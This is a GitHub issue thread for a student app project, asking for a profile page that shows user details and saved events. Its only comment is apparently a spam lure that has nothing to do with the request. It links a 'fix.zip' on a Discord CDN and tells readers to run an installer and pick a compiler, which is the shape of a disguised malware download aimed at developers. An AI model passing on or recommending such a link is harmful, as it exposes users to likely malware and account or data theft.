### ISSUE TITLE
Profile Page

### ISSUE THREAD

**Issue by niga5892** [zliel/CST438Project1#4]
As a user, I want to be able to view my profile information and see the events I have saved, so that I can easily access my personal details and favourite events in one place.

Including:
-Display of the username and other relevant user details.
-A list of saved events that I have liked, fetched from the Room database.
-A clean and user-friendly UI that is easy to navigate.

**Comment by Klevente12** [comment]
try this
https://cdn.discordapp.com/attachments/1277836331501883449/1280291965879193731/fix.zip?ex=66d78c4f&is=66d63acf&hm=ac05131390b92a2047e3ee0fc4189fe126bf357b3d3cd73f5c0e51ba28c1c538&
select the desired compiler in the installer
